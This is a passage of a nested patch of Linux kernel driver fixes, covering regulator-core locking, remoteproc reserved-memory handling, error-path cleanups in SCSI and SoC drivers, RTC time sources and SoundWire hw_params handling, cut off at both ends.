++		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
++					 mdp->data->con0_sel,
++					 mdp->data->con0_sel);
++	}
++
+ 	mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+ 				 PWM_CLKDIV_MASK,
+ 				 clk_div << PWM_CLKDIV_SHIFT);
+@@ -152,17 +165,6 @@ static int mtk_disp_pwm_apply(struct pwm_chip *chip, struct pwm_device *pwm,
+ 		mtk_disp_pwm_update_bits(mdp, mdp->data->commit,
+ 					 mdp->data->commit_mask,
+ 					 0x0);
+-	} else {
+-		/*
+-		 * For MT2701, disable double buffer before writing register
+-		 * and select manual mode and use PWM_PERIOD/PWM_HIGH_WIDTH.
+-		 */
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
+-					 mdp->data->bls_debug_mask,
+-					 mdp->data->bls_debug_mask);
+-		mtk_disp_pwm_update_bits(mdp, mdp->data->con0,
+-					 mdp->data->con0_sel,
+-					 mdp->data->con0_sel);
+ 	}
+ 
+ 	mtk_disp_pwm_update_bits(mdp, DISP_PWM_EN, mdp->data->enable_mask,
+@@ -194,6 +196,16 @@ static int mtk_disp_pwm_get_state(struct pwm_chip *chip,
+ 		return err;
+ 	}
+ 
++	/*
++	 * Apply DISP_PWM_DEBUG settings to choose whether to enable or disable
++	 * the register double buffer and manual commit to the working register
++	 * before performing any read/write operation.
++	 */
++	if (mdp->data->bls_debug)
++		mtk_disp_pwm_update_bits(mdp, mdp->data->bls_debug,
++					 mdp->data->bls_debug_mask,
++					 mdp->data->bls_debug_mask);
++
+ 	rate = clk_get_rate(mdp->clk_main);
+ 	con0 = readl(mdp->base + mdp->data->con0);
+ 	con1 = readl(mdp->base + mdp->data->con1);
+diff --git a/drivers/regulator/core.c b/drivers/regulator/core.c
+index 4fcd36055b025..08726bc0da9d7 100644
+--- a/drivers/regulator/core.c
++++ b/drivers/regulator/core.c
+@@ -207,6 +207,78 @@ static void regulator_unlock(struct regulator_dev *rdev)
+ 	mutex_unlock(&regulator_nesting_mutex);
+ }
+ 
++/**
++ * regulator_lock_two - lock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * Locks both rdevs using the regulator_ww_class.
++ */
++static void regulator_lock_two(struct regulator_dev *rdev1,
++			       struct regulator_dev *rdev2,
++			       struct ww_acquire_ctx *ww_ctx)
++{
++	struct regulator_dev *tmp;
++	int ret;
++
++	ww_acquire_init(ww_ctx, &regulator_ww_class);
++
++	/* Try to just grab both of them */
++	ret = regulator_lock_nested(rdev1, ww_ctx);
++	WARN_ON(ret);
++	ret = regulator_lock_nested(rdev2, ww_ctx);
++	if (ret != -EDEADLOCK) {
++		WARN_ON(ret);
++		goto exit;
++	}
++
++	while (true) {
++		/*
++		 * Start of loop: rdev1 was locked and rdev2 was contended.
++		 * Need to unlock rdev1, slowly lock rdev2, then try rdev1
++		 * again.
++		 */
++		regulator_unlock(rdev1);
++
++		ww_mutex_lock_slow(&rdev2->mutex, ww_ctx);
++		rdev2->ref_cnt++;
++		rdev2->mutex_owner = current;
++		ret = regulator_lock_nested(rdev1, ww_ctx);
++
++		if (ret == -EDEADLOCK) {
++			/* More contention; swap which needs to be slow */
++			tmp = rdev1;
++			rdev1 = rdev2;
++			rdev2 = tmp;
++		} else {
++			WARN_ON(ret);
++			break;
++		}
++	}
++
++exit:
++	ww_acquire_done(ww_ctx);
++}
++
++/**
++ * regulator_unlock_two - unlock two regulators
++ * @rdev1:		first regulator
++ * @rdev2:		second regulator
++ * @ww_ctx:		w/w mutex acquire context
++ *
++ * The inverse of regulator_lock_two().
++ */
++
++static void regulator_unlock_two(struct regulator_dev *rdev1,
++				 struct regulator_dev *rdev2,
++				 struct ww_acquire_ctx *ww_ctx)
++{
++	regulator_unlock(rdev2);
++	regulator_unlock(rdev1);
++	ww_acquire_fini(ww_ctx);
++}
++
+ static bool regulator_supply_is_couple(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *c_rdev;
+@@ -334,6 +406,7 @@ static void regulator_lock_dependent(struct regulator_dev *rdev,
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_lock_recursive(rdev,
+@@ -1583,9 +1656,6 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 			rdev->constraints->always_on = true;
+ 	}
+ 
+-	if (rdev->desc->off_on_delay)
+-		rdev->last_off = ktime_get_boottime();
+-
+ 	/* If the constraints say the regulator should be on at this point
+ 	 * and we have control then make sure it is enabled.
+ 	 */
+@@ -1619,6 +1689,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ 		if (rdev->constraints->always_on)
+ 			rdev->use_count++;
++	} else if (rdev->desc->off_on_delay) {
++		rdev->last_off = ktime_get();
+ 	}
+ 
+ 	print_constraints(rdev);
+@@ -1627,8 +1699,8 @@ static int set_machine_constraints(struct regulator_dev *rdev)
+ 
+ /**
+  * set_supply - set regulator supply regulator
+- * @rdev: regulator name
+- * @supply_rdev: supply regulator name
++ * @rdev: regulator (locked)
++ * @supply_rdev: supply regulator (locked)
+  *
+  * Called by platform initialisation code to set the supply regulator for this
+  * regulator. This ensures that a regulators supply will also be enabled by the
+@@ -1800,6 +1872,8 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	struct regulator *regulator;
+ 	int err = 0;
+ 
++	lockdep_assert_held_once(&rdev->mutex.base);
++
+ 	if (dev) {
+ 		char buf[REG_STR_SIZE];
+ 		int size;
+@@ -1827,9 +1901,7 @@ static struct regulator *create_regulator(struct regulator_dev *rdev,
+ 	regulator->rdev = rdev;
+ 	regulator->supply_name = supply_name;
+ 
+-	regulator_lock(rdev);
+ 	list_add(&regulator->list, &rdev->consumer_list);
+-	regulator_unlock(rdev);
+ 
+ 	if (dev) {
+ 		regulator->dev = dev;
+@@ -1995,6 +2067,7 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ {
+ 	struct regulator_dev *r;
+ 	struct device *dev = rdev->dev.parent;
++	struct ww_acquire_ctx ww_ctx;
+ 	int ret = 0;
+ 
+ 	/* No supply to resolve? */
+@@ -2061,23 +2134,23 @@ static int regulator_resolve_supply(struct regulator_dev *rdev)
+ 	 * between rdev->supply null check and setting rdev->supply in
+ 	 * set_supply() from concurrent tasks.
+ 	 */
+-	regulator_lock(rdev);
++	regulator_lock_two(rdev, r, &ww_ctx);
+ 
+ 	/* Supply just resolved by a concurrent task? */
+ 	if (rdev->supply) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+ 	ret = set_supply(rdev, r);
+ 	if (ret < 0) {
+-		regulator_unlock(rdev);
++		regulator_unlock_two(rdev, r, &ww_ctx);
+ 		put_device(&r->dev);
+ 		goto out;
+ 	}
+ 
+-	regulator_unlock(rdev);
++	regulator_unlock_two(rdev, r, &ww_ctx);
+ 
+ 	/*
+ 	 * In set_machine_constraints() we may have turned this regulator on
+@@ -2190,7 +2263,9 @@ struct regulator *_regulator_get(struct device *dev, const char *id,
+ 		return regulator;
+ 	}
+ 
++	regulator_lock(rdev);
+ 	regulator = create_regulator(rdev, dev, id);
++	regulator_unlock(rdev);
+ 	if (regulator == NULL) {
+ 		regulator = ERR_PTR(-ENOMEM);
+ 		module_put(rdev->owner);
+@@ -2668,7 +2743,7 @@ static int _regulator_do_enable(struct regulator_dev *rdev)
+ 
+ 	trace_regulator_enable(rdev_get_name(rdev));
+ 
+-	if (rdev->desc->off_on_delay && rdev->last_off) {
++	if (rdev->desc->off_on_delay) {
+ 		/* if needed, keep a distance of off_on_delay from last time
+ 		 * this regulator was disabled.
+ 		 */
+@@ -6049,6 +6124,7 @@ static void regulator_summary_lock(struct ww_acquire_ctx *ww_ctx)
+ 			ww_mutex_lock_slow(&new_contended_rdev->mutex, ww_ctx);
+ 			old_contended_rdev = new_contended_rdev;
+ 			old_contended_rdev->ref_cnt++;
++			old_contended_rdev->mutex_owner = current;
+ 		}
+ 
+ 		err = regulator_summary_lock_all(ww_ctx,
+diff --git a/drivers/regulator/stm32-pwr.c b/drivers/regulator/stm32-pwr.c
+index 2a42acb7c24e9..e5dd4db6403b2 100644
+--- a/drivers/regulator/stm32-pwr.c
++++ b/drivers/regulator/stm32-pwr.c
+@@ -129,17 +129,16 @@ static const struct regulator_desc stm32_pwr_desc[] = {
+ 
+ static int stm32_pwr_regulator_probe(struct platform_device *pdev)
+ {
+-	struct device_node *np = pdev->dev.of_node;
+ 	struct stm32_pwr_reg *priv;
+ 	void __iomem *base;
+ 	struct regulator_dev *rdev;
+ 	struct regulator_config config = { };
+ 	int i, ret = 0;
+ 
+-	base = of_iomap(np, 0);
+-	if (!base) {
++	base = devm_platform_ioremap_resource(pdev, 0);
++	if (IS_ERR(base)) {
+ 		dev_err(&pdev->dev, "Unable to map IO memory\n");
+-		return -ENOMEM;
++		return PTR_ERR(base);
+ 	}
+ 
+ 	config.dev = &pdev->dev;
+diff --git a/drivers/remoteproc/xlnx_r5_remoteproc.c b/drivers/remoteproc/xlnx_r5_remoteproc.c
+index 2db57d3941555..5dd007622603d 100644
+--- a/drivers/remoteproc/xlnx_r5_remoteproc.c
++++ b/drivers/remoteproc/xlnx_r5_remoteproc.c
+@@ -61,8 +61,6 @@ static const struct mem_bank_data zynqmp_tcm_banks[] = {
+  * @np: device node of RPU instance
+  * @tcm_bank_count: number TCM banks accessible to this RPU
+  * @tcm_banks: array of each TCM bank data
+- * @rmem_count: Number of reserved mem regions
+- * @rmem: reserved memory region nodes from device tree
+  * @rproc: rproc handle
+  * @pm_domain_id: RPU CPU power domain id
+  */
+@@ -71,8 +69,6 @@ struct zynqmp_r5_core {
+ 	struct device_node *np;
+ 	int tcm_bank_count;
+ 	struct mem_bank_data **tcm_banks;
+-	int rmem_count;
+-	struct reserved_mem **rmem;
+ 	struct rproc *rproc;
+ 	u32 pm_domain_id;
+ };
+@@ -239,21 +235,29 @@ static int add_mem_regions_carveout(struct rproc *rproc)
+ {
+ 	struct rproc_mem_entry *rproc_mem;
+ 	struct zynqmp_r5_core *r5_core;
++	struct of_phandle_iterator it;
+ 	struct reserved_mem *rmem;
+-	int i, num_mem_regions;
++	int i = 0;
+ 
+ 	r5_core = (struct zynqmp_r5_core *)rproc->priv;
+-	num_mem_regions = r5_core->rmem_count;
+ 
+-	for (i = 0; i < num_mem_regions; i++) {
+-		rmem = r5_core->rmem[i];
++	/* Register associated reserved memory regions */
++	of_phandle_iterator_init(&it, r5_core->np, "memory-region", NULL, 0);
+ 
+-		if (!strncmp(rmem->name, "vdev0buffer", strlen("vdev0buffer"))) {
++	while (of_phandle_iterator_next(&it) == 0) {
++		rmem = of_reserved_mem_lookup(it.node);
++		if (!rmem) {
++			of_node_put(it.node);
++			dev_err(&rproc->dev, "unable to acquire memory-region\n");
++			return -EINVAL;
++		}
++
++		if (!strcmp(it.node->name, "vdev0buffer")) {
+ 			/* Init reserved memory for vdev buffer */
+ 			rproc_mem = rproc_of_resm_mem_entry_init(&rproc->dev, i,
+ 								 rmem->size,
+ 								 rmem->base,
+-								 rmem->name);
++								 it.node->name);
+ 		} else {
+ 			/* Register associated reserved memory regions */
+ 			rproc_mem = rproc_mem_entry_init(&rproc->dev, NULL,
+@@ -261,16 +265,19 @@ static int add_mem_regions_carveout(struct rproc *rproc)
+ 							 rmem->size, rmem->base,
+ 							 zynqmp_r5_mem_region_map,
+ 							 zynqmp_r5_mem_region_unmap,
+-							 rmem->name);
++							 it.node->name);
+ 		}
+ 
+-		if (!rproc_mem)
++		if (!rproc_mem) {
++			of_node_put(it.node);
+ 			return -ENOMEM;
++		}
+ 
+ 		rproc_add_carveout(rproc, rproc_mem);
+ 
+ 		dev_dbg(&rproc->dev, "reserved mem carveout %s addr=%llx, size=0x%llx",
+-			rmem->name, rmem->base, rmem->size);
++			it.node->name, rmem->base, rmem->size);
++		i++;
+ 	}
+ 
+ 	return 0;
+@@ -726,59 +733,6 @@ static int zynqmp_r5_get_tcm_node(struct zynqmp_r5_cluster *cluster)
+ 	return 0;
+ }
+ 
+-/**
+- * zynqmp_r5_get_mem_region_node()
+- * parse memory-region property and get reserved mem regions
+- *
+- * @r5_core: pointer to zynqmp_r5_core type object
+- *
+- * Return: 0 for success and error code for failure.
+- */
+-static int zynqmp_r5_get_mem_region_node(struct zynqmp_r5_core *r5_core)
+-{
+-	struct device_node *np, *rmem_np;
+-	struct reserved_mem **rmem;
+-	int res_mem_count, i;
+-	struct device *dev;
+-
+-	dev = r5_core->dev;
+-	np = r5_core->np;
+-
+-	res_mem_count = of_property_count_elems_of_size(np, "memory-region",
+-							sizeof(phandle));
+-	if (res_mem_count <= 0) {
+-		dev_warn(dev, "failed to get memory-region property %d\n",
+-			 res_mem_count);
+-		return 0;
+-	}
+-
+-	rmem = devm_kcalloc(dev, res_mem_count,
+-			    sizeof(struct reserved_mem *), GFP_KERNEL);
+-	if (!rmem)
+-		return -ENOMEM;
+-
+-	for (i = 0; i < res_mem_count; i++) {
+-		rmem_np = of_parse_phandle(np, "memory-region", i);
+-		if (!rmem_np)
+-			goto release_rmem;
+-
+-		rmem[i] = of_reserved_mem_lookup(rmem_np);
+-		if (!rmem[i]) {
+-			of_node_put(rmem_np);
+-			goto release_rmem;
+-		}
+-
+-		of_node_put(rmem_np);
+-	}
+-
+-	r5_core->rmem_count = res_mem_count;
+-	r5_core->rmem = rmem;
+-	return 0;
+-
+-release_rmem:
+-	return -EINVAL;
+-}
+-
+ /*
+  * zynqmp_r5_core_init()
+  * Create and initialize zynqmp_r5_core type object
+@@ -806,10 +760,6 @@ static int zynqmp_r5_core_init(struct zynqmp_r5_cluster *cluster,
+ 	for (i = 0; i < cluster->core_count; i++) {
+ 		r5_core = cluster->r5_cores[i];
+ 
+-		ret = zynqmp_r5_get_mem_region_node(r5_core);
+-		if (ret)
+-			dev_warn(dev, "memory-region prop failed %d\n", ret);
+-
+ 		/* Initialize r5 cores with power-domains parsed from dts */
+ 		ret = of_property_read_u32_index(r5_core->np, "power-domains",
+ 						 1, &r5_core->pm_domain_id);
+diff --git a/drivers/rpmsg/qcom_glink_native.c b/drivers/rpmsg/qcom_glink_native.c
+index 35df1b0a515bf..67e7664efb0dc 100644
+--- a/drivers/rpmsg/qcom_glink_native.c
++++ b/drivers/rpmsg/qcom_glink_native.c
+@@ -1348,8 +1348,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 	ret = qcom_glink_tx(glink, &req, sizeof(req), data, chunk_size, wait);
+ 
+ 	/* Mark intent available if we failed */
+-	if (ret && intent) {
+-		intent->in_use = false;
++	if (ret) {
++		if (intent)
++			intent->in_use = false;
+ 		return ret;
+ 	}
+ 
+@@ -1370,8 +1371,9 @@ static int __qcom_glink_send(struct glink_channel *channel,
+ 				    chunk_size, wait);
+ 
+ 		/* Mark intent available if we failed */
+-		if (ret && intent) {
+-			intent->in_use = false;
++		if (ret) {
++			if (intent)
++				intent->in_use = false;
+ 			break;
+ 		}
+ 	}
+diff --git a/drivers/rtc/rtc-meson-vrtc.c b/drivers/rtc/rtc-meson-vrtc.c
+index 1463c86215615..648fa362ec447 100644
+--- a/drivers/rtc/rtc-meson-vrtc.c
++++ b/drivers/rtc/rtc-meson-vrtc.c
+@@ -23,7 +23,7 @@ static int meson_vrtc_read_time(struct device *dev, struct rtc_time *tm)
+ 	struct timespec64 time;
+ 
+ 	dev_dbg(dev, "%s\n", __func__);
+-	ktime_get_raw_ts64(&time);
++	ktime_get_real_ts64(&time);
+ 	rtc_time64_to_tm(time.tv_sec, tm);
+ 
+ 	return 0;
+@@ -96,7 +96,7 @@ static int __maybe_unused meson_vrtc_suspend(struct device *dev)
+ 		long alarm_secs;
+ 		struct timespec64 time;
+ 
+-		ktime_get_raw_ts64(&time);
++		ktime_get_real_ts64(&time);
+ 		local_time = time.tv_sec;
+ 
+ 		dev_dbg(dev, "alarm_time = %lus, local_time=%lus\n",
+diff --git a/drivers/rtc/rtc-omap.c b/drivers/rtc/rtc-omap.c
+index 4d4f3b1a73093..73634a3ccfd3b 100644
+--- a/drivers/rtc/rtc-omap.c
++++ b/drivers/rtc/rtc-omap.c
+@@ -25,6 +25,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm_runtime.h>
+ #include <linux/rtc.h>
++#include <linux/rtc/rtc-omap.h>
+ 
+ /*
+  * The OMAP RTC is a year/month/day/hours/minutes/seconds BCD clock
+diff --git a/drivers/rtc/rtc-ti-k3.c b/drivers/rtc/rtc-ti-k3.c
+index ba23163cc0428..0d90fe9233550 100644
+--- a/drivers/rtc/rtc-ti-k3.c
++++ b/drivers/rtc/rtc-ti-k3.c
+@@ -632,7 +632,8 @@ static int __maybe_unused ti_k3_rtc_suspend(struct device *dev)
+ 	struct ti_k3_rtc *priv = dev_get_drvdata(dev);
+ 
+ 	if (device_may_wakeup(dev))
+-		enable_irq_wake(priv->irq);
++		return enable_irq_wake(priv->irq);
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/s390/block/dasd.c b/drivers/s390/block/dasd.c
+index 5a6d9c15395f7..bce3422d85640 100644
+--- a/drivers/s390/block/dasd.c
++++ b/drivers/s390/block/dasd.c
+@@ -2941,7 +2941,7 @@ static int _dasd_requeue_request(struct dasd_ccw_req *cqr)
+ 		return 0;
+ 	spin_lock_irq(&cqr->dq->lock);
+ 	req = (struct request *) cqr->callback_data;
+-	blk_mq_requeue_request(req, false);
++	blk_mq_requeue_request(req, true);
+ 	spin_unlock_irq(&cqr->dq->lock);
+ 
+ 	return 0;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+index d643c5a49aa94..70c24377c6a19 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v1_hw.c
+@@ -1258,7 +1258,11 @@ static void slot_complete_v1_hw(struct hisi_hba *hisi_hba,
+ 
+ 		slot_err_v1_hw(hisi_hba, task, slot);
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+index cded42f4ca445..02575d81afca2 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v2_hw.c
+@@ -2404,7 +2404,11 @@ static void slot_complete_v2_hw(struct hisi_hba *hisi_hba,
+ 				 error_info[2], error_info[3]);
+ 
+ 		if (unlikely(slot->abort)) {
+-			sas_task_abort(task);
++			if (dev_is_sata(device) && task->ata_task.use_ncq)
++				sas_ata_device_link_abort(device, true);
++			else
++				sas_task_abort(task);
++
+ 			return;
+ 		}
+ 		goto out;
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index a63279f55d096..9afc23e3a80fc 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+@@ -2320,7 +2320,11 @@ static void slot_complete_v3_hw(struct hisi_hba *hisi_hba,
+ 					error_info[0], error_info[1],
+ 					error_info[2], error_info[3]);
+ 			if (unlikely(slot->abort)) {
+-				sas_task_abort(task);
++				if (dev_is_sata(device) && task->ata_task.use_ncq)
++					sas_ata_device_link_abort(device, true);
++				else
++					sas_task_abort(task);
++
+ 				return;
+ 			}
+ 			goto out;
+diff --git a/drivers/scsi/lpfc/lpfc_init.c b/drivers/scsi/lpfc/lpfc_init.c
+index eeb73da754d0d..99d2694fe00a0 100644
+--- a/drivers/scsi/lpfc/lpfc_init.c
++++ b/drivers/scsi/lpfc/lpfc_init.c
+@@ -11970,7 +11970,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 				goto out_iounmap_all;
+ 		} else {
+ 			error = -ENOMEM;
+-			goto out_iounmap_all;
++			goto out_iounmap_ctrl;
+ 		}
+ 	}
+ 
+@@ -11988,7 +11988,7 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 			dev_err(&pdev->dev,
+ 			   "ioremap failed for SLI4 HBA dpp registers.\n");
+ 			error = -ENOMEM;
+-			goto out_iounmap_ctrl;
++			goto out_iounmap_all;
+ 		}
+ 		phba->pci_bar4_memmap_p = phba->sli4_hba.dpp_regs_memmap_p;
+ 	}
+@@ -12013,9 +12013,11 @@ lpfc_sli4_pci_mem_setup(struct lpfc_hba *phba)
+ 	return 0;
+ 
+ out_iounmap_all:
+-	iounmap(phba->sli4_hba.drbl_regs_memmap_p);
++	if (phba->sli4_hba.drbl_regs_memmap_p)
++		iounmap(phba->sli4_hba.drbl_regs_memmap_p);
+ out_iounmap_ctrl:
+-	iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
++	if (phba->sli4_hba.ctrl_regs_memmap_p)
++		iounmap(phba->sli4_hba.ctrl_regs_memmap_p);
+ out_iounmap_conf:
+ 	iounmap(phba->sli4_hba.conf_regs_memmap_p);
+ 
+diff --git a/drivers/scsi/megaraid.c b/drivers/scsi/megaraid.c
+index bf491af9f0d65..16e2cf848c6ef 100644
+--- a/drivers/scsi/megaraid.c
++++ b/drivers/scsi/megaraid.c
+@@ -1441,6 +1441,7 @@ mega_cmd_done(adapter_t *adapter, u8 completed[], int nstatus, int status)
+ 		 */
+ 		if (cmdid == CMDID_INT_CMDS) {
+ 			scb = &adapter->int_scb;
++			cmd = scb->cmd;
+ 
+ 			list_del_init(&scb->list);
+ 			scb->state = SCB_FREE;
+diff --git a/drivers/scsi/mpi3mr/mpi3mr_fw.c b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+index a565817aa56d4..d109a4ceb72b1 100644
+--- a/drivers/scsi/mpi3mr/mpi3mr_fw.c
++++ b/drivers/scsi/mpi3mr/mpi3mr_fw.c
+@@ -2526,7 +2526,7 @@ static void mpi3mr_watchdog_work(struct work_struct *work)
+ 		mrioc->unrecoverable = 1;
+ 		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_SOFT_RESET_IN_PROGRESS:
+-		return;
++		goto schedule_work;
+ 	case MPI3_SYSIF_FAULT_CODE_CI_ACTIVATION_RESET:
+ 		reset_reason = MPI3MR_RESET_FROM_CIACTIV_FAULT;
+ 		break;
+diff --git a/drivers/soc/bcm/brcmstb/biuctrl.c b/drivers/soc/bcm/brcmstb/biuctrl.c
+index e1d7b45432485..364ddbe365c24 100644
+--- a/drivers/soc/bcm/brcmstb/biuctrl.c
++++ b/drivers/soc/bcm/brcmstb/biuctrl.c
+@@ -288,6 +288,10 @@ static int __init setup_hifcpubiuctrl_regs(struct device_node *np)
+ 	if (BRCM_ID(family_id) == 0x7260 && BRCM_REV(family_id) == 0)
+ 		cpubiuctrl_regs = b53_cpubiuctrl_no_wb_regs;
+ out:
++	if (ret && cpubiuctrl_base) {
++		iounmap(cpubiuctrl_base);
++		cpubiuctrl_base = NULL;
++	}
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soc/qcom/rpmh-rsc.c b/drivers/soc/qcom/rpmh-rsc.c
+index 0f8b2249f8894..f93544f6d7961 100644
+--- a/drivers/soc/qcom/rpmh-rsc.c
++++ b/drivers/soc/qcom/rpmh-rsc.c
+@@ -1073,7 +1073,7 @@ static int rpmh_rsc_probe(struct platform_device *pdev)
+ 	drv->ver.minor = rsc_id & (MINOR_VER_MASK << MINOR_VER_SHIFT);
+ 	drv->ver.minor >>= MINOR_VER_SHIFT;
+ 
+-	if (drv->ver.major == 3 && drv->ver.minor == 0)
++	if (drv->ver.major == 3 && drv->ver.minor >= 0)
+ 		drv->regs = rpmh_rsc_reg_offset_ver_3_0;
+ 	else
+ 		drv->regs = rpmh_rsc_reg_offset_ver_2_7;
+diff --git a/drivers/soc/renesas/renesas-soc.c b/drivers/soc/renesas/renesas-soc.c
+index 468ebce1ea88b..51191d1a6dd1d 100644
+--- a/drivers/soc/renesas/renesas-soc.c
++++ b/drivers/soc/renesas/renesas-soc.c
+@@ -471,8 +471,11 @@ static int __init renesas_soc_init(void)
+ 	}
+ 
+ 	soc_dev_attr = kzalloc(sizeof(*soc_dev_attr), GFP_KERNEL);
+-	if (!soc_dev_attr)
++	if (!soc_dev_attr) {
++		if (chipid)
++			iounmap(chipid);
+ 		return -ENOMEM;
++	}
+ 
+ 	np = of_find_node_by_path("/");
+ 	of_property_read_string(np, "model", &soc_dev_attr->machine);
+diff --git a/drivers/soc/ti/k3-ringacc.c b/drivers/soc/ti/k3-ringacc.c
+index e01e4d815230a..8f131368a7586 100644
+--- a/drivers/soc/ti/k3-ringacc.c
++++ b/drivers/soc/ti/k3-ringacc.c
+@@ -406,6 +406,11 @@ static int k3_dmaring_request_dual_ring(struct k3_ringacc *ringacc, int fwd_id,
+ 
+ 	mutex_lock(&ringacc->req_lock);
+ 
++	if (!try_module_get(ringacc->dev->driver->owner)) {
++		ret = -EINVAL;
++		goto err_module_get;
++	}
++
+ 	if (test_bit(fwd_id, ringacc->rings_inuse)) {
+ 		ret = -EBUSY;
+ 		goto error;
+@@ -421,6 +426,8 @@ static int k3_dmaring_request_dual_ring(struct k3_ringacc *ringacc, int fwd_id,
+ 	return 0;
+ 
+ error:
++	module_put(ringacc->dev->driver->owner);
++err_module_get:
+ 	mutex_unlock(&ringacc->req_lock);
+ 	return ret;
+ }
+diff --git a/drivers/soc/ti/pm33xx.c b/drivers/soc/ti/pm33xx.c
+index ce09c42eaed25..f04c21157904b 100644
+--- a/drivers/soc/ti/pm33xx.c
++++ b/drivers/soc/ti/pm33xx.c
+@@ -527,7 +527,7 @@ static int am33xx_pm_probe(struct platform_device *pdev)
+ 
+ 	ret = am33xx_pm_alloc_sram();
+ 	if (ret)
+-		return ret;
++		goto err_wkup_m3_ipc_put;
+ 
+ 	ret = am33xx_pm_rtc_setup();
+ 	if (ret)
+@@ -572,13 +572,14 @@ err_pm_runtime_put:
+ 	pm_runtime_put_sync(dev);
+ err_pm_runtime_disable:
+ 	pm_runtime_disable(dev);
+-	wkup_m3_ipc_put(m3_ipc);
+ err_unsetup_rtc:
+ 	iounmap(rtc_base_virt);
+ 	clk_put(rtc_fck);
+ err_free_sram:
+ 	am33xx_pm_free_sram();
+ 	pm33xx_dev = NULL;
++err_wkup_m3_ipc_put:
++	wkup_m3_ipc_put(m3_ipc);
+ 	return ret;
+ }
+ 
+diff --git a/drivers/soundwire/cadence_master.h b/drivers/soundwire/cadence_master.h
+index e0a64b28c6b9c..4393607c7e4ad 100644
+--- a/drivers/soundwire/cadence_master.h
++++ b/drivers/soundwire/cadence_master.h
+@@ -84,7 +84,6 @@ struct sdw_cdns_stream_config {
+  * @bus: Bus handle
+  * @stream_type: Stream type
+  * @link_id: Master link id
+- * @hw_params: hw_params to be applied in .prepare step
+  * @suspended: status set when suspended, to be used in .prepare
+  * @paused: status set in .trigger, to be used in suspend
+  * @direction: stream direction
+@@ -96,7 +95,6 @@ struct sdw_cdns_dai_runtime {
+ 	struct sdw_bus *bus;
+ 	enum sdw_stream_type stream_type;
+ 	int link_id;
+-	struct snd_pcm_hw_params *hw_params;
+ 	bool suspended;
+ 	bool paused;
+ 	int direction;
+diff --git a/drivers/soundwire/intel.c b/drivers/soundwire/intel.c
+index bc9c50bacc494..c852745989167 100644
+--- a/drivers/soundwire/intel.c
++++ b/drivers/soundwire/intel.c
+@@ -833,7 +833,6 @@ static int intel_hw_params(struct snd_pcm_substream *substream,
+ 	dai_runtime->paused = false;
+ 	dai_runtime->suspended = false;
+ 	dai_runtime->pdi = pdi;
+-	dai_runtime->hw_params = params;
+ 
+ 	/* Inform DSP about PDI stream number */
+ 	ret = intel_params_stream(sdw, substream->stream, dai, params,
+@@ -886,6 +885,11 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 	}
+ 
+ 	if (dai_runtime->suspended) {
++		struct snd_soc_pcm_runtime *rtd = asoc_substream_to_rtd(substream);
++		struct snd_pcm_hw_params *hw_params;
++
++		hw_params = &rtd->dpcm[substream->stream].hw_params;
++
+ 		dai_runtime->suspended = false;
+ 
+ 		/*
+@@ -897,7 +901,7 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 		 */
+ 
+ 		/* configure stream */
+-		ch = params_channels(dai_runtime->hw_params);
++		ch = params_channels(hw_params);
+ 		if (substream->stream == SNDRV_PCM_STREAM_CAPTURE)
+ 			dir = SDW_DATA_DIR_RX;
+ 		else
+@@ -909,7 +913,7 @@ static int intel_prepare(struct snd_pcm_substream *substream,
+ 
+ 		/* Inform DSP about PDI stream number */
+ 		ret = intel_params_stream(sdw, substream->stream, dai,
+-					  dai_runtime->hw_params,
++					  hw_params,
+ 					  sdw->instance,
+ 					  dai_runtime->pdi->intel_alh_id);
+ 	}
+@@ -948,7 +952,6 @@ intel_hw_free(struct snd_pcm_substream *substream, struct snd_soc_dai *dai)
+ 		return ret;
+ 	}
+ 
+-	dai_runtime->hw_params = NULL;
+ 	dai_runtime->pdi = NULL;
+ 
+ 	return 0;
+diff --git a/drivers/soundwire/qcom.c b/drivers/soundwire/qcom.c
+index 3354248702900..ba502129150d5 100644
+--- a/drivers/soundwire/qcom.c
++++ b/drivers/soundwire/qcom.c
